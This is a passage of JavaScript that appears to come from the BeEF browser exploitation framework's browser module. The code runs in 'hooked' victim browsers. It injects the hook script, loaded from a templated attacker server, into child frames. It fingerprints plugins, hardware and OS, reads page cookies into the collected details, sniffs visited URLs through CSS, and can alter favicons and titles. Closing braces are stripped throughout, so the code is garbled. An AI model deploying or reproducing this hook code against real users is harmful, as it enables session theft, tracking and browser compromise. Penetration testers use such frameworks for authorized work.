return 'UNKNOWN'; // Unknown UA
* Hooks all child frames in the current window
* Restricted by same-origin policy
hookChildFrames: function () {
// create script object
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = '<%== @beef_proto %>://<%== @beef_host %>:<%== @beef_port %><%== @hook_file %>';
// loop through child frames
for (var i = 0; i < self.frames.length; i++) {
try {
// append hook script
beef.debug("Hooked child frame [src:" + self.frames[i].window.location.href + "]");
} catch (e) {
// warn on cross-origin
beef.debug("Hooking child frame failed: " + e.message);
* Checks if the zombie has flash installed and enabled.
* @return: {Boolean} true or false.
* @example: if(beef.browser.hasFlash()) { ... }
hasFlash: function () {
if (!beef.browser.isIE()) {
return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
if (!!navigator.plugins) {
return (navigator.plugins["Shockwave Flash"] != undefined);
// IE
var flash_versions = 12;
if (window.ActiveXObject != null) {
for (x = 2; x <= flash_versions; x++) {
try {
Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
if (Flash) {
return true;
} catch (e) {
beef.debug("Creating Flash ActiveX object failed: " + e.message);
return false;
* Checks if the zombie has the QuickTime plugin installed.
* @return: {Boolean} true or false.
* @example: if ( beef.browser.hasQuickTime() ) { ... }
hasQuickTime: function () {
if (!!navigator.plugins) {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("QuickTime") >= 0) {
return true;
// IE
try {
var qt_test = new ActiveXObject('QuickTime.QuickTime');
if (qt_test) {
return true;
} catch (e) {
beef.debug("Creating QuickTime ActiveX object failed: " + e.message);
return false;
* Checks if the zombie has the RealPlayer plugin installed.
* @return: {Boolean} true or false.
* @example: if ( beef.browser.hasRealPlayer() ) { ... }
hasRealPlayer: function () {
if (!!navigator.plugins) {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("RealPlayer") >= 0) {
return true;
// IE
var definedControls = [
'rmocx.RealPlayer G2 Control',
'rmocx.RealPlayer G2 Control.1',
'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
for (var i = 0; i < definedControls.length; i++) {
try {
var rp_test = new ActiveXObject(definedControls[i]);
if (rp_test) {
return true;
} catch (e) {
beef.debug("Creating RealPlayer ActiveX object failed: " + e.message);
return false;
* Checks if the zombie has the Windows Media Player plugin installed.
* @return: {Boolean} true or false.
* @example: if ( beef.browser.hasWMP() ) { ... }
hasWMP: function () {
if (!!navigator.plugins) {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("Windows Media Player") >= 0) {
return true;
// IE
try {
var wmp_test = new ActiveXObject('WMPlayer.OCX');
if (wmp_test) {
return true;
} catch (e) {
beef.debug("Creating WMP ActiveX object failed: " + e.message);
return false;
* Checks if VLC is installed
* @return: {Boolean} true or false
hasVLC: function () {
if (beef.browser.isIE() || beef.browser.isEdge()) {
try {
control = new ActiveXObject("VideoLAN.VLCPlugin.2");
return true;
} catch (e) {
beef.debug("Creating VLC ActiveX object failed: " + e.message);
} else {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("VLC") >= 0) {
return true;
return false;
* Checks if the zombie has Java enabled.
* @return: {Boolean} true or false.
* @example: if(beef.browser.javaEnabled()) { ... }
javaEnabled: function () {
return navigator.javaEnabled();
* Checks if the Phonegap API is available from the hooked origin.
* @return: {Boolean} true or false.
* @example: if(beef.browser.hasPhonegap()) { ... }
hasPhonegap: function () {
var result = false;
try {
if (!!device.phonegap || !!device.cordova) result = true; else result = false;
catch (e) {
result = false;
return result;
* Checks if the browser supports CORS
* @return: {Boolean} true or false.
* @example: if(beef.browser.hasCors()) { ... }
hasCors: function () {
if ('withCredentials' in new XMLHttpRequest())
return true;
else if (typeof XDomainRequest !== "undefined")
return true;
return false;
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
* @example: if(beef.browser.hasJava()) { ... }
hasJava: function () {
if (beef.browser.getPlugins().match(/java/i) && beef.browser.javaEnabled()) {
return true;
} else {
return false;
* Checks if the zombie has VBScript enabled.
* @return: {Boolean} true or false.
* @example: if(beef.browser.hasVBScript()) { ... }
hasVBScript: function () {
if ((navigator.userAgent.indexOf('MSIE') != -1) && (navigator.userAgent.indexOf('Win') != -1)) {
return true;
} else {
return false;
* Returns the list of plugins installed in the browser.
getPlugins: function () {
var results;
function unique(array) {
return $j.grep(array, function(el, index) {
return index === $j.inArray(el, array);
// Things lacking navigator.plugins
if (!navigator.plugins)
return this.getPluginsIE();
// All other browsers that support navigator.plugins
if (navigator.plugins && navigator.plugins.length > 0) {
results = new Array();
for (var i = 0; i < navigator.plugins.length; i++) {
// Firefox returns exact plugin versions
if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
// Webkit and Presto (Opera)
// Don't support the version attribute
// Sometimes store the version in description (Real, Adobe)
else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
results = unique(results).toString();
// All browsers that don't support navigator.plugins
} else {
results = new Array();
//firefox https://bugzilla.mozilla.org/show_bug.cgi?id=757726
// On linux sistem the "version" slot is empty so I'll attach "description" after version
var plugins = {
'AdobeAcrobat': {
'control': 'Adobe Acrobat',
'return': function (control) {
try {
version = navigator.plugins["Adobe Acrobat"]["description"];
return 'Adobe Acrobat Version ' + version; //+ " description "+ filename;
catch (e) {
'Flash': {
'control': 'Shockwave Flash',
'return': function (control) {
try {
version = navigator.plugins["Shockwave Flash"]["description"];
return 'Flash Player Version ' + version; //+ " description "+ filename;
catch (e) {
'Google_Talk_Plugin_Accelerator': {
'control': 'Google Talk Plugin Video Accelerator',
'return': function (control) {
try {
version = navigator.plugins['Google Talk Plugin Video Accelerator']["description"];
return 'Google Talk Plugin Video Accelerator Version ' + version; //+ " description "+ filename;
catch (e) {
'Google_Talk_Plugin': {
'control': 'Google Talk Plugin',
'return': function (control) {
try {
version = navigator.plugins['Google Talk Plugin']["description"];
return 'Google Talk Plugin Version ' + version;// " description "+ filename;
catch (e) {
'Facebook_Video_Calling_Plugin': {
'control': 'Facebook Video Calling Plugin',
'return': function (control) {
try {
version = navigator.plugins["Facebook Video Calling Plugin"]["description"];
return 'Facebook Video Calling Plugin Version ' + version;//+ " description "+ filename;
catch (e) {
'Google_Update': {
'control': 'Google Update',
'return': function (control) {
try {
version = navigator.plugins["Google Update"]["description"];
return 'Google Update Version ' + version//+ " description "+ filename;
catch (e) {
'Windows_Activation_Technologies': {
'control': 'Windows Activation Technologies',
'return': function (control) {
try {
version = navigator.plugins["Windows Activation Technologies"]["description"];
return 'Windows Activation Technologies Version ' + version;//+ " description "+ filename;
catch (e) {
'VLC_Web_Plugin': {
'control': 'VLC Web Plugin',
'return': function (control) {
try {
version = navigator.plugins["VLC Web Plugin"]["description"];
return 'VLC Web Plugin Version ' + version;//+ " description "+ filename;
catch (e) {
'Google_Earth_Plugin': {
'control': 'Google Earth Plugin',
'return': function (control) {
try {
version = navigator.plugins['Google Earth Plugin']["description"];
return 'Google Earth Plugin Version ' + version;//+ " description "+ filename;
catch (e) {
'FoxitReader_Plugin': {
'control': 'FoxitReader Plugin',
'return': function (control) {
try {
version = navigator.plugins['Foxit Reader Plugin for Mozilla']['version'];
return 'FoxitReader Plugin Version ' + version;
} catch (e) {
var c = 0;
for (var i in plugins) {
//each element od plugins
var control = plugins[i]['control'];
try {
var version = plugins[i]['return'](control);
if (version) {
results[c] = version;
c = c + 1;
catch (e) {
// Return results
return results;
* Returns a list of plugins detected by IE. This is a hack because IE doesn't
* support navigator.plugins
getPluginsIE: function () {
var results = '';
var plugins = {
'AdobePDF6': {
'control': 'PDF.PdfCtrl',
'return': function (control) {
version = control.getVersions().split(',');
version = version[0].split('=');
return 'Acrobat Reader v' + parseFloat(version[1]);
'AdobePDF7': {
'control': 'AcroPDF.PDF',
'return': function (control) {
version = control.getVersions().split(',');
version = version[0].split('=');
return 'Acrobat Reader v' + parseFloat(version[1]);
'Flash': {
'control': 'ShockwaveFlash.ShockwaveFlash',
'return': function (control) {
version = control.getVariable('$version').substring(4);
return 'Flash Player v' + version.replace(/,/g, ".");
'Quicktime': {
'control': 'QuickTime.QuickTime',
'return': function (control) {
return 'QuickTime Player';
'RealPlayer': {
'control': 'RealPlayer',
'return': function (control) {
version = control.getVersionInfo();
return 'RealPlayer v' + parseFloat(version);
'Shockwave': {
'control': 'SWCtl.SWCtl',
'return': function (control) {
version = control.ShockwaveVersion('').split('r');
return 'Shockwave v' + parseFloat(version[0]);
'WindowsMediaPlayer': {
'control': 'WMPlayer.OCX',
'return': function (control) {
return 'Windows Media Player v' + parseFloat(control.versionInfo);
'FoxitReaderPlugin': {
'control': 'FoxitReader.FoxitReaderCtl.1',
'return': function (control) {
return 'Foxit Reader Plugin v' + parseFloat(control.versionInfo);
if (window.ActiveXObject) {
var j = 0;
for (var i in plugins) {
var control = null;
var version = null;
try {
control = new ActiveXObject(plugins[i]['control']);
} catch (e) {
if (control) {
if (j != 0)
results += ', ';
results += plugins[i]['return'](control);
return results;
* Returns zombie browser window size.
* @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow
getWindowSize: function () {
var myWidth = 0, myHeight = 0;
if (typeof( window.innerWidth ) == 'number') {
// Non-IE
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if (document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )) {
// IE 6+ in 'standards compliant mode'
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if (document.body && ( document.body.clientWidth || document.body.clientHeight )) {
// IE 4 compatible
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
return {
width: myWidth,
height: myHeight
* Construct hash from browser details. This function is used to grab the browser details during the hooking process
getDetails: function () {
var details = new Array();
var browser_name = beef.browser.getBrowserName();
var browser_version = beef.browser.getBrowserVersion();
var browser_engine = beef.browser.getBrowserEngine();
var browser_reported_name = beef.browser.getBrowserReportedName();
var browser_language = beef.browser.getBrowserLanguage();
var page_title = (document.title) ? document.title : "Unknown";
var origin = (window.origin) ? window.origin : "Unknown";
var page_uri = (document.location.href) ? document.location.href : "Unknown";
var page_referrer = (document.referrer) ? document.referrer : "Unknown";
var page_hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
var default_port = "";
switch (document.location.protocol) {
case "http:":
var default_port = "80";
case "https:":
var default_port = "443";
var page_hostport = (document.location.port) ? document.location.port : default_port;
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var os_family = beef.os.getFamily();
var os_version = beef.os.getVersion();
var os_arch = beef.os.getArch();
var default_browser = beef.os.getDefaultBrowser();
var hw_type = beef.hardware.getName();
var battery_details = beef.hardware.getBatteryDetails();
try {
var battery_charging_status = battery_details.chargingStatus;
var battery_level = battery_details.batteryLevel;
var battery_charging_time = battery_details.chargingTime;
var battery_discharging_time = battery_details.dischargingTime;
} catch(e) {}
var memory = beef.hardware.getMemory();
var cpu_arch = beef.hardware.getCpuArch();
var cpu_cores = beef.hardware.getCpuCores();
var gpu_details = beef.hardware.getGpuDetails();
try {
var gpu = gpu_details.gpu;
var gpu_vendor = gpu_details.vendor;
} catch(e) {}
var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : 'Unknown';
var screen_size = beef.hardware.getScreenSize();
try {
var screen_width = screen_size.width;
var screen_height = screen_size.height;
var screen_colordepth = screen_size.colordepth;
} catch(e) {}
var window_size = beef.browser.getWindowSize();
try {
window_width = window_size.width;
window_height = window_size.height;
} catch(e) {}
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
var has_web_worker = (beef.browser.hasWebWorker()) ? "Yes" : "No";
var has_web_gl = (beef.browser.hasWebGL()) ? "Yes" : "No";
var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
try {
var cookies = document.cookie;
if (cookies) details['browser.window.cookies'] = cookies;
} catch (e) {
beef.debug("Cookies can't be read. The hooked origin is most probably using HttpOnly.");
details['browser.window.cookies'] = '';
if (browser_name) details['browser.name'] = browser_name;
if (browser_version) details['browser.version'] = browser_version;
if (browser_engine) details['browser.engine'] = browser_engine;
if (browser_reported_name) details['browser.name.reported'] = browser_reported_name;
if (browser_platform) details['browser.platform'] = browser_platform;
if (browser_language) details['browser.language'] = browser_language;
if (browser_plugins) details['browser.plugins'] = browser_plugins;
if (page_title) details['browser.window.title'] = page_title;
if (origin) details['browser.window.origin'] = origin;
if (page_hostname) details['browser.window.hostname'] = page_hostname;
if (page_hostport) details['browser.window.hostport'] = page_hostport;
if (page_uri) details['browser.window.uri'] = page_uri;
if (page_referrer) details['browser.window.referrer'] = page_referrer;
if (window_width) details['browser.window.size.width'] = window_width;
if (window_height) details['browser.window.size.height'] = window_height;
if (date_stamp) details['browser.date.datestamp'] = date_stamp;
if (os_name) details['host.os.name'] = os_name;
if (os_family) details['host.os.family'] = os_family;
if (os_version) details['host.os.version'] = os_version;
if (os_arch) details['host.os.arch'] = os_arch;
if (default_browser) details['host.software.defaultbrowser'] = default_browser;
if (hw_type) details['hardware.type'] = hw_type;
if (memory) details['hardware.memory'] = memory;
if (gpu) details['hardware.gpu'] = gpu;
if (gpu_vendor) details['hardware.gpu.vendor'] = gpu_vendor;
if (cpu_arch) details['hardware.cpu.arch'] = cpu_arch;
if (cpu_cores) details['hardware.cpu.cores'] = cpu_cores;
if (battery_charging_status) details['hardware.battery.chargingstatus'] = battery_charging_status;
if (battery_level) details['hardware.battery.level'] = battery_level;
if (battery_charging_time) details['hardware.battery.chargingtime'] = battery_charging_time;
if (battery_discharging_time) details['hardware.battery.dischargingtime'] = battery_discharging_time;
if (screen_width) details['hardware.screen.size.width'] = screen_width;
if (screen_height) details['hardware.screen.size.height'] = screen_height;
if (screen_colordepth) details['hardware.screen.colordepth'] = screen_colordepth;
if (touch_enabled) details['hardware.screen.touchenabled'] = touch_enabled;
if (vbscript_enabled) details['browser.capabilities.vbscript'] = vbscript_enabled;
if (has_flash) details['browser.capabilities.flash'] = has_flash;
if (has_silverlight) details['browser.capabilities.silverlight'] = has_silverlight;
if (has_phonegap) details['browser.capabilities.phonegap'] = has_phonegap;
if (has_web_socket) details['browser.capabilities.websocket'] = has_web_socket;
if (has_webrtc) details['browser.capabilities.webrtc'] = has_webrtc;
if (has_web_worker) details['browser.capabilities.webworker'] = has_web_worker;
if (has_web_gl) details['browser.capabilities.webgl'] = has_web_gl;
if (has_googlegears) details['browser.capabilities.googlegears'] = has_googlegears;
if (has_activex) details['browser.capabilities.activex'] = has_activex;
if (has_quicktime) details['browser.capabilities.quicktime'] = has_quicktime;
if (has_realplayer) details['browser.capabilities.realplayer'] = has_realplayer;
if (has_wmp) details['browser.capabilities.wmp'] = has_wmp;
if (has_vlc) details['browser.capabilities.vlc'] = has_vlc;
return details;
* Returns boolean value depending on whether the browser supports ActiveX
hasActiveX: function () {
return !!window.ActiveXObject;
* Returns boolean value depending on whether the browser supports WebRTC
hasWebRTC: function () {
return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
* Returns boolean value depending on whether the browser supports Silverlight
hasSilverlight: function () {
var result = false;
try {
if (beef.browser.hasActiveX()) {
var slControl = new ActiveXObject('AgControl.AgControl');
result = true;
} else if (navigator.plugins["Silverlight Plug-In"]) {
result = true;
} catch (e) {
result = false;
return result;
* Returns array of results, whether or not the target zombie has visited the specified URL
hasVisited: function (urls) {
var results = new Array();
var iframe = beef.dom.createInvisibleIframe();
var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document;
ifdoc.write('<style>a:visited{width:0px !important;}</style>');
urls = urls.split("\n");
var count = 0;
for (var i in urls) {
var u = urls[i];
if (u != "" || u != null) {
var success = false;
var a = ifdoc.createElement('a');
a.href = u;
var width = null;
(a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width");
if (width == '0px') {
success = true;
results.push({'url': u, 'visited': success});
if (results.length == 0) {
return false;
return results;
* Checks if the zombie has Web Sockets enabled.
* @return: {Boolean} true or false.
* In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket
* */
hasWebSocket: function () {
return !!window.WebSocket || !!window.MozWebSocket;
* Checks if the zombie has Web Workers enabled.
* @return: {Boolean} true or false.
* */
hasWebWorker: function () {
return (typeof(Worker) !== "undefined");
* Checks if the zombie has WebGL enabled.
* @return: {Boolean} true or false.
* @from: https://github.com/idofilin/webgl-by-example/blob/master/detect-webgl/detect-webgl.js
* */
hasWebGL: function () {
try {
var canvas = document.createElement("canvas");
var gl = canvas.getContext("webgl") || canvas.getContext("experimental-webgl");
return !!(gl && gl instanceof WebGLRenderingContext);
} catch(e) {
return false;
* Checks if the zombie has Google Gears installed.
* @return: {Boolean} true or false.
* @from: https://code.google.com/apis/gears/gears_init.js
* */
hasGoogleGears: function () {
var ggfactory = null;
// Chrome
if (window.google && google.gears) return true;
// Firefox
if (typeof GearsFactory != 'undefined') {
ggfactory = new GearsFactory();
} else {
// IE
try {
ggfactory = new ActiveXObject('Gears.Factory');
// IE Mobile on WinCE.
if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) {
} catch (e) {
// Safari
if ((typeof navigator.mimeTypes != 'undefined')
&& navigator.mimeTypes["application/x-googlegears"]) {
ggfactory = document.createElement("object");
ggfactory.style.display = "none";
ggfactory.width = 0;
ggfactory.height = 0;
ggfactory.type = "application/x-googlegears";
if (ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null;
if (!ggfactory) return false; else return true;
* Checks if the zombie has Foxit PDF reader plugin.
* @return: {Boolean} true or false.
* @example: if(beef.browser.hasFoxit()) { ... }
* */
hasFoxit: function () {
var foxitplugin = false;
try {
if (beef.browser.hasActiveX()) {
var foxitControl = new ActiveXObject('FoxitReader.FoxitReaderCtl.1');
foxitplugin = true;
} else if (navigator.plugins['Foxit Reader Plugin for Mozilla']) {
foxitplugin = true;
} catch (e) {
foxitplugin = false;
return foxitplugin;
* Returns the page head HTML
getPageHead: function () {
var html_head;
try {
html_head = document.head.innerHTML.toString();
} catch (e) {
return html_head;
* Returns the page body HTML
getPageBody: function () {
var html_body;
try {
html_body = document.body.innerHTML.toString();
} catch (e) {
return html_body;
* Dynamically changes the favicon: works in Firefox, Chrome and Opera
changeFavicon: function (favicon_url) {
var iframe = null;
if (this.isC()) {
iframe = document.createElement('iframe');
iframe.src = 'about:blank';
iframe.style.display = 'none';
var link = document.createElement('link'),
oldLink = document.getElementById('dynamic-favicon');
link.id = 'dynamic-favicon';
link.rel = 'shortcut icon';
link.href = favicon_url;
if (oldLink) document.head.removeChild(oldLink);
if (this.isC()) iframe.src += '';
* Changes page title
changePageTitle: function (title) {
document.title = title;
* Get the browser language
getBrowserLanguage: function () {
var l = 'Unknown';
try {
l = window.navigator.userLanguage || window.navigator.language;
} catch (e) {
return l;
* A function that gets the max number of simultaneous connections the
* browser can make per origin, or globally on all origin.
* This code is based on research from browserspy.dk
* @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default}
* @return {Object} A jQuery deferred object promise, which when resolved passes
* the number of connections to the callback function as "this"
getMaxConnections: function (scope) {
* example usage:
* $j.when(getMaxConnections()).done(function(){
* console.debug("Max Connections: " + this);
* });
var imagesCount = 30; // Max number of images to test
var secondsTimeout = 5; // Image load timeout threashold
var testUrl = ""; // The image testing service URL
// User broserspy.dk max connections service URL.
if (scope == 'PER_DOMAIN')
testUrl = "http://browserspy.dk/connections.php?img=1&random=";
// The token will be replaced by a different number with each request (different origin).
testUrl = "http://<token>.browserspy.dk/connections.php?img=1&random=";
var imagesLoaded = 0; // Number of responding images before timeout.
var imagesRequested = 0; // Number of requested images.
var testImages = new Array(); // Array of all images.
var deferredObject = $j.Deferred(); // A jquery Deferred object.
for (var i = 1; i <= imagesCount; i++) {
// Asynchronously request image.
testImages[i] =
type: "get",
dataType: true,
url: (testUrl.replace("<token>", i)) + Math.random(),
data: "",
timeout: (secondsTimeout * 1000),
// Function on completion of request.
complete: function (jqXHR, textStatus) {
// If the image returns a 200 or a 302, the text Status is "error", else null
if (textStatus == "error") {
// If all images requested
if (imagesRequested >= imagesCount) {
// resolve the deferred object passing the number of loaded images.
// Return a promise to resolve the deffered object when the images are loaded.
return deferredObject.promise();